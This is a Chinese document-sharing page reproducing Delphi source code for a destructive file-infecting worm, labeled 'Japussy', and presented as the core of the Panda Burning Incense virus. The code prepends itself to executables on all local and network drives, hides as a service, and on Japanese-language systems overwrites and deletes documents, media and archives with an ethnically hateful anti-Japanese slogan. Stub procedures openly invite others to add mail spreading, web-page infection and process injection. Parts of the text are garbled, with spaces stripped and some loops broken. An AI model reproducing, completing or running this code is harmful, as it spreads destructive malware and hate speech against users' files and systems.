熊猫烧香核心代码.docx
- 文档编号:4040264
- 上传时间:2022-11-27
- 格式:DOCX
- 页数:8
- 大小:18.31KB
熊猫烧香核心代码.docx
《熊猫烧香核心代码.docx》由会员分享,可在线阅读,更多相关《熊猫烧香核心代码.docx(8页珍藏版)》请在冰豆网上搜索。
熊猫烧香核心代码
programJapussy;
uses
Windows,SysUtils,Classes,Graphics,ShellAPI{,Registry};
const
HeaderSize=82432; //病毒体的大小
IconOffset=$12EB8; //PE文件主图标的偏移量
//在我的Delphi5SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize=38912; //Upx压缩过病毒体的大小
IconOffset=$92BC; //Upx压缩过PE文件主图标的偏移量
//Upx1.24W用法:
upx-9--8086Japussy.exe
}
IconSize =$2E8; //PE文件主图标的大小--744字节
IconTail =IconOffset+IconSize; //PE文件主图标的尾部
ID =$44444444; //感染标记
//垃圾码,以备写入
Catchword='Ifaraceneedtobekilledout,itmustbeYamato.'+
'Ifacountryneedtobedestroyed,itmustbeJapan!
'+
'***W32.Japussy.Worm.A***';
{$R*.RES}
functionRegisterServiceProcess(dwProcessID,dwType:
Integer):
Integer;
stdcall;external'Kernel32.dll';//函数声明
var
TmpFile:
string;
Si:
STARTUPINFO;
Pi:
PROCESS_INFORMATION;
IsJap:
Boolean=False;//日文操作系统标记
{判断是否为Win9x}
functionIsWin9x:
Boolean;
var
Ver:
TOSVersionInfo;
begin
Result:
=False;
Ver.dwOSVersionInfoSize:
=SizeOf(TOSVersionInfo);
ifnotGetVersionEx(Ver)then
Exit;
if(Ver.dwPlatformID=VER_PLATFORM_WIN32_WINDOWS)then//Win9x
Result:
=True;
end;
{在流之间复制}
procedureCopyStream(Src:
TStream;sStartPos:
Integer;Dst:
TStream;
dStartPos:
Integer;Count:
Integer);
var
sCurPos,dCurPos:
Integer;
begin
sCurPos:
=Src.Position;
dCurPos:
=Dst.Position;
Src.Seek(sStartPos,0);
Dst.Seek(dStartPos,0);
Dst.CopyFrom(Src,Count);
Src.Seek(sCurPos,0);
Dst.Seek(dCurPos,0);
end;
{将宿主文件从已感染的PE文件中分离出来,以备使用}
procedureExtractFile(FileName:
string);
var
sStream,dStream:
TFileStream;
begin
try
sStream:
=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);
try
dStream:
=TFileStream.Create(FileName,fmCreate);
try
sStream.Seek(HeaderSize,0);//跳过头部的病毒部分
dStream.CopyFrom(sStream,sStream.Size-HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{填充STARTUPINFO结构}
procedureFillStartupInfo(varSi:
STARTUPINFO;State:
Word);
begin
Si.cb:
=SizeOf(Si);
Si.lpReserved:
=nil;
Si.lpDesktop:
=nil;
Si.lpTitle:
=nil;
Si.dwFlags:
=STARTF_USESHOWWINDOW;
Si.wShowWindow:
=State;
Si.cbReserved2:
=0;
Si.lpReserved2:
=nil;
end;
{发带毒邮件}
procedureSendMail;
begin
//哪位仁兄愿意完成之?
end;
{感染PE文件}
procedureInfectOneFile(FileName:
string);
var
HdrStream,SrcStream:
TFileStream;
IcoStream,DstStream:
TMemoryStream;
iID:
LongInt;
aIcon:
TIcon;
Infected,IsPE:
Boolean;
i:
Integer;
Buf:
array[0..1]ofChar;
begin
try//出错则文件正在被使用,退出
ifCompareText(FileName,'JAPUSSY.EXE')=0then//是自己则不感染
Exit;
Infected:
=False;
IsPE :
=False;
SrcStream:
=TFileStream.Create(FileName,fmOpenRead);
try
fori:
=0to$108do//检查PE文件头
begin
SrcStream.Seek(i,soFromBeginning);
SrcStream.Read(Buf,2);
if(Buf[0]=#80)and(Buf[1]=#69)then//PE标记
begin
IsPE:
=True;//是PE文件
Break;
end;
end;
SrcStream.Seek(-4,soFromEnd);//检查感染标记
SrcStream.Read(iID,4);
if(iID=ID)or(SrcStream.Size<10240)then//太小的文件不感染
Infected:
=True;
finally
SrcStream.Free;
end;
ifInfectedor(notIsPE)then//如果感染过了或不是PE文件则退出
Exit;
IcoStream:
=TMemoryStream.Create;
DstStream:
=TMemoryStream.Create;
try
aIcon:
=TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle:
=ExtractIcon(HInstance,PChar(FileName),0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream:
=TFileStream.Create(FileName,fmOpenRead);
//头文件
HdrStream:
=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream,0,DstStream,0,IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream,22,DstStream,IconOffset,IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream,IconTail,DstStream,IconTail,HeaderSize-IconTail);
//写入宿主程序
CopyStream(SrcStream,0,DstStream,HeaderSize,SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0,2);
iID:
=$44444444;
DstStream.Write(iID,4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName);//替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{将目标文件写入垃圾码后删除}
procedureSmashFile(FileName:
string);
var
FileHandle:
Integer;
i,Size,Mass,Max,Len:
Integer;
begin
try
SetFileAttributes(PChar(FileName),0);//去掉只读属性
FileHandle:
=FileOpen(FileName,fmOpenWrite);//打开文件
try
Size:
=GetFileSize(FileHandle,nil);//文件大小
i:
=0;
Randomize;
Max:
=Random(15);//写入垃圾码的随机次数
ifMax<5then
Max:
=5;
Mass:
=SizedivMax;//每个间隔块的大小
Len:
=Length(Catchword);
whilei begin FileSeek(FileHandle,i*Mass,0);//定位 //写入垃圾码,将文件彻底破坏掉 FileWrite(FileHandle,Catchword,Len); Inc(i); end; finally FileClose(FileHandle);//关闭文件 end; DeleteFile(PChar(FileName));//删除之 except end; end; {获得可写的驱动器列表} functionGetDrives: string; var DiskType: Word; D: Char; Str: string; i: Integer; begin fori: =0to25do//遍历26个字母 begin D: =Chr(i+65); Str: =D+': '; DiskType: =GetDriveType(PChar(Str)); //得到本地磁盘和网络盘 if(DiskType=DRIVE_FIXED)or(DiskType=DRIVE_REMOTE)then Result: =Result+D; end; end; {遍历目录,感染和摧毁文件} procedureLoopFiles(Path,Mask: string); var i,Count: Integer; Fn,Ext: string; SubDir: TStrings; SearchRec: TSearchRec; Msg: TMsg; functionIsValidDir(SearchRec: TSearchRec): Integer; begin if(SearchRec.Attr '.')and (SearchRec.Name<>'..')then Result: =0//不是目录 elseif(SearchRec.Attr=16)and (SearchRec.Name<>'.')and (SearchRec.Name<>'..')then Result: =1//不是根目录 elseResult: =2;//是根目录 end; begin if(FindFirst(Path+Mask,faAnyFile,SearchRec)=0)then begin repeat PeekMessage(Msg,0,0,0,PM_REMOVE);//调整消息队列,避免引起怀疑 ifIsValidDir(SearchRec)=0then begin Fn: =Path+SearchRec.Name; Ext: =UpperCase(ExtractFileExt(Fn)); if(Ext='.EXE')or(Ext='.SCR')then begin InfectOneFile(Fn);//感染可执行文件 end elseif(Ext='.HTM')or(Ext='.HTML')or(Ext='.ASP')then begin //感染HTML和ASP文件,将Base64编码后的病毒写入 //感染浏览此网页的所有用户 //哪位大兄弟愿意完成之? end elseifExt='.WAB'then//Outlook地址簿文件 begin //获取Outlook邮件地址 end elseifExt='.ADC'then//Foxmail地址自动完成文件 begin //获取Foxmail邮件地址 end elseifExt='IND'then//Foxmail地址簿文件 begin //获取Foxmail邮件地址 end else begin ifIsJapthen//是倭文操作系统 begin if(Ext='.DOC')or(Ext='.XLS')or(Ext='.MDB')or (Ext='.MP3')or(Ext='.RM')or(Ext='.RA')or (Ext='.WMA')or(Ext='.ZIP')or(Ext='.RAR')or (Ext='.MPEG')or(Ext='.ASF')or(Ext='.JPG')or (Ext='.JPEG')or(Ext='.GIF')or(Ext='.SWF')or (Ext='.PDF')or(Ext='.CHM')or(Ext='.AVI')then SmashFile(Fn);//摧毁文件 end; end; end; //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑 Sleep(200); until(FindNext(SearchRec)<>0); end; FindClose(SearchRec); SubDir: =TStringList.Create; if(FindFirst(Path+'*.*',faDirectory,SearchRec)=0)then begin repeat ifIsValidDir(SearchRec)=1then SubDir.Add(SearchRec.Name); until(FindNext(SearchRec)<>0); end; FindClose(SearchRec); Count: =SubDir.Count-1; fori: =0toCountdo LoopFiles(Path+SubDir.Strings+'',Mask); FreeAndNil(SubDir); end; {遍历磁盘上所有的文件} procedureInfectFiles; var DriverList: string; i,Len: Integer; begin ifGetACP=932then//日文操作系统 IsJap: =True;//去死吧! DriverList: =GetDrives;//得到可写的磁盘列表 Len: =Length(DriverList); whileTruedo//死循环 begin fori: =Lendownto1do//遍历每个磁盘驱动器 LoopFiles(DriverList+': ','*.*');//感染之 SendMail;//发带毒邮件 Sleep(1000*60*5);//睡眠5分钟 end; end; {主程序开始} begin ifIsWin9xthen//是Win9x RegisterServiceProcess(GetCurrentProcessID,1)//注册为服务进程 else//WinNT begin //远程线程映射到Explorer进程 //哪位兄台愿意完成之? end; //如果是原始病毒体自己 ifCompareText(ExtractFileName(ParamStr(0)),'Japussy.exe')=0then InfectFiles//感染和发邮件 else//已寄生于宿主程序上了,开始工作 begin TmpFile: =ParamStr(0);//创建临时文件 Delete(TmpFile,Length(TmpFile)-4,4); TmpFile: =TmpFile+#32+'.exe';//真正的宿主文件,多一个空格 ExtractFile(TmpFile);//分离之 FillStartupInfo(Si,SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile),PChar(TmpFile),nil,nil,True, 0,nil,'.',Si,Pi);//创建新进程运行之 InfectFiles;//感染和发邮件 end; end
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 熊猫 烧香 核心 代码